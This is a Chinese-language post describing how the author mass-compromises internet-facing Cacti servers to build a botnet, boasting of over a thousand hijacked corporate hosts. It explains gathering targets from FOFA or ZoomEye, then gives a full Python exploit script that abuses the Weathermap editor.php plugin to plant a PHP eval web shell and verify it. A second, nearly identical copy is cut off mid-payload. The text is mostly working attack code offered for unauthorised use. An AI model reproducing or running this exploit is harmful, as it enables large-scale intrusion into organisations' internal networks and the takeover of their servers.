企业核心区域除线上业务,只剩下运维与数据库相关系统,想建立僵尸网络,在完成平时的渗透工作时快速定位自己是否有目标相关内网权限,挂马获取员工PC起或者一些新装服务挂马,基效果并不会太好,一些服务如: walle,HUE,Django,zabbix,zookeeper,hadoop,Flume-ng、GraphicsMagick。这些系统如果能找到相关主机漏洞或者相对鸡肋的漏洞,都可以获取质量相对较高的内网权限。
这次,我们使用的是cacti。一个很老的漏洞,之前是东西是2015年写的POC的,之前抓到了2000+,最近需要一些肉鸡,所以又试了一下,发现还是能找到1000多台全球主机,基本都在企业内网,包括国内外知名企业。
0×01 数据获取可以使用zoomeyes api 与fafo api ,我使用的是fofa。
zoomeyes 与 fafo 采集结果数据两者是不同的。所以exp 我给出两种不同结构。
zoomeyes数据结构: (域名) +端口
fofa数据结构: http://+ (域名)+端口
0×02 脚本使用使用命令 exp.py -f ip.txt (IP里面格式一行放一个IP) ,IP端口需要修改的话,请修改port_list。这种对应 zoomeyes的数据结构。
import argparseimport sys
import netaddr
import multiprocessing
import time
import Queue
import requests
import threading
port_list = ['80,443,8080,81,8081']
payload = '/plugins/weathermap/editor.php?plug=0&mapname=conn.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=_title=<?php echo(md5(1));@eval($_POST[0]);?>_legend=Traffic+Load_stamp=Created:+%b+%d+%Y+%H:%M:%S_linkdefaultwidth=7_linkdefaultbwin=100M_linkdefaultbwout=100M_width=800_height=600_pngfile=_htmlfile=_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name'
payload2 = '/plugins/weathermap/configs/conn.php'
payload3 = '/cacti/plugins/weathermap/editor.php?plug=0&mapname=conn.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=_title=<?php echo(md5(1));@eval($_POST[0]);?>_legend=Traffic+Load_stamp=Created:+%b+%d+%Y+%H:%M:%S_linkdefaultwidth=7_linkdefaultbwin=100M_linkdefaultbwout=100M_width=800_height=600_pngfile=_htmlfile=_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name'
payload4 = '/cacti/plugins/weathermap/configs/conn.php'
class main_class(object):
def __init__(self,target_ip,thread_num):
#print target_ip
self.target_ip = target_ip
self.thread_num = thread_num
self.queue = Queue.Queue()
self.start_time = time.time()
self.load_queue()
def load_queue(self):
for i in port_list:
self.queue.put(i)
def worker(self):
while self.queue.qsize() > 0:
port = self.queue.get()
try:
req = requests.get("http://"+self.target_ip+":"+port,timeout=3)
if "Cacti" in req.content:
try:
#print self.target_ip
requests.get("http://"+self.target_ip+":"+port+payload,timeout=3)
req = requests.get("http://"+self.target_ip+":"+port+payload2,timeout=3)
if "c4ca4238a0b923820dcc509a6f75849b" in req.content:
#print self.target_ip,port
print "http://"+self.target_ip+":"+port+payload2
except:
try:
requests.get("http://"+self.target_ip+":"+port+payload3,timeout=3)
req = requests.get("http://"+self.target_ip+":"+port+payload4,timeout=3)
if "c4ca4238a0b923820dcc509a6f75849b" in req.content:
#print self.target_ip,port
print "http://"+self.target_ip+":"+port+payload4
except:
pass
else:
continue
except:
pass
self.queue.task_done()
def main(self):
thread_list = []
for i in range(self.thread_num):
t = threading.Thread(target = self.worker)
thread_list.append(t)
t.setDaemon(True)
t.start()
for i in thread_list:
i.join()
def func(ip,num):
#for i in xrange(3):
#print ip
main = main_class(target_ip = ip,thread_num = num)
main.main()
time.sleep(0.1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='portscan')
parser.add_argument('-t',action='store',dest='thread_num',default='10',help='thread number',type=int)
parser.add_argument('-i',action='store',dest='dest_ip',help='destination ip',type=str)
parser.add_argument('-a',action='store',dest='dest_ipaddr',help='destination ip addr',type=str)
parser.add_argument('-f',action='store',dest='dest_file',help='destination ip file',type=str)
if len(sys.argv) == 1:
sys.argv.append('-h')
args = parser.parse_args()
a = []
if args.dest_ip:
a.append(args.dest_ip)
elif args.dest_ipaddr:
for i in netaddr.IPNetwork(args.dest_ipaddr):
a.append(i)
elif args.dest_file:
for i in open(args.dest_file).readlines():
i = i.strip('\n')
a.append(i)
else:
print "-t -i or -a or -f"
sys.exit(-1)
for target_ip in a:
pool = multiprocessing.Pool(processes=2)
pool.apply_async(func, (target_ip,args.thread_num))
pool.close()
pool.join()
使用命令 exp.py -f ip.txt (ip.txt格式:http://(IP或者域名):端口)
import argparseimport sys
import netaddr
import multiprocessing
import time
import Queue
import requests
import threading
port_list = ['80,443,8080,81,8081']
payload = '/plugins/weathermap/editor.php?plug=0&mapname=conn.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=_title=<?php echo(md5(1));@eval($_POST[0]);?>_legend=Traffic+Load_stamp=Created:+%b+%d+%Y+%H:%M:%S_linkdefaultwidth=7_linkdefaultbwin=100M_linkdefaultbwout=100M_width=800_height=600_pngfile=_htmlfile=_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name'
payload2 = '/plugins/weathermap/configs/conn.php'
payload3 = '/cacti/plugins/weathermap/editor.php?plug=0&mapname=conn.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=_title=<?php echo(md5(1));@eval($_POST[0]);?>_legend=Traffic+Load_stamp=Created:+%b+%d+%Y+%H:%M:%S_linkdefaultwidth=7_linkdefaultbwin=100M_linkdefaultbwout=100M_width=800_height=600_pngfile=_htmlfile=_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3